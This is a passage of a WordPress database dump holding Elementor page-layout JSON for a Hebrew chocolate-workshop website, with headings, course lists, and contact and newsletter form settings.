\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"31be803d\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"68a336e5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"5bb3e53\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5b2bedda\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"71a725e0\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(439,105,'_elementor_version','0.4'),(440,106,'_wp_page_template','elementor_canvas'),(441,106,'_elementor_edit_mode','builder'),(442,106,'_elementor_data','[{\"id\":\"5841dc66\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"4504fb06\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"b815b78\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"76b85204\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"4855771b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"23c8927c\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4eb9f6ca\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2d2198b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"79ff081e\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea, \\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd \\u05d5\\u05e7\\u05d1\\u05d5\\u05e6\\u05d5\\u05ea\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"cdcd955\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/groups-choco.jpg\",\"id\":104},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4d880f94\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>\\u05d0\\u05dd \\u05d0\\u05ea\\u05dd \\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05e7\\u05d7\\u05ea \\u05d9\\u05d5\\u05dd \\u05db\\u05d9\\u05e3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05de\\u05d4\\u05e2\\u05d1\\u05d5\\u05d3\\u05d4, \\u05d4\\u05d2\\u05d9\\u05e2 \\u05d4\\u05d6\\u05de\\u05df \\u05dc\\u05d4\\u05db\\u05d9\\u05e8 \\u05d0\\u05ea \\u05d4\\u05de\\u05ea\\u05db\\u05d5\\u05df \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05dc\\u05d0\\u05d9\\u05d2\\u05d5\\u05d3 \\u05d7\\u05d1\\u05e8\\u05d4 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8.\\u00a0<\\/strong><\\/p><p>\\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05dc\\u05d0\\u05e8\\u05d2\\u05df \\u05d6\\u05d0\\u05ea \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05db\\u05d6\\u05d5 \\u05e9\\u05d4\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05d1\\u05e7\\u05d1\\u05d5\\u05e6\\u05d4 \\u05d9\\u05ea\\u05d7\\u05dc\\u05e7\\u05d5 \\u05dc\\u05e7\\u05d1\\u05d5\\u05e6\\u05d5\\u05ea \\u05d5\\u05d9\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05de\\u05e0\\u05d5\\u05ea \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1\\u05d5\\u05ea \\u05e2\\u05dc\\u05d9\\u05d4\\u05dd, \\u05d4\\u05d7\\u05dc \\u05de\\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05d7\\u05d3 \\u05e2\\u05dd \\u05d4\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05dc\\u05e2\\u05d1\\u05d5\\u05d3\\u05d4 \\u05d5\\u05e2\\u05d3 \\u05dc\\u05e2\\u05e8\\u05d1\\u05d5\\u05d1 \\u05d5\\u05d6\\u05d9\\u05dc\\u05d5\\u05e3 \\u05dc\\u05e2\\u05d5\\u05d2\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05d4\\u05e0\\u05d5\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d8\\u05e2\\u05d9\\u05dd \\u05d9\\u05d7\\u05d3 \\u05e2\\u05dd \\u05d4\\u05d7\\u05d1\\u05e8 \\u05e9\\u05d0\\u05ea\\u05dd \\u05e8\\u05d2\\u05d9\\u05dc\\u05d9\\u05dd \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05d9\\u05ea\\u05d5 \\u05e1\\u05dc\\u05d8, \\u05dc\\u05d0 \\u05d4\\u05d2\\u05d9\\u05e2 \\u05d4\\u05d6\\u05de\\u05df \\u05dc\\u05d3\\u05e2\\u05ea \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d9\\u05d7\\u05d3 \\u05d2\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7?\\u00a0<\\/p><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"fd9ed4d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"16c16700\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"76bff3cc\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f5a1a2b\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"7dc8b868\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"679b4d51\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"79e92b2c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"1755930a\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f43216a\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"22e902c5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"79642803\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"31be803d\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"68a336e5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"5bb3e53\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 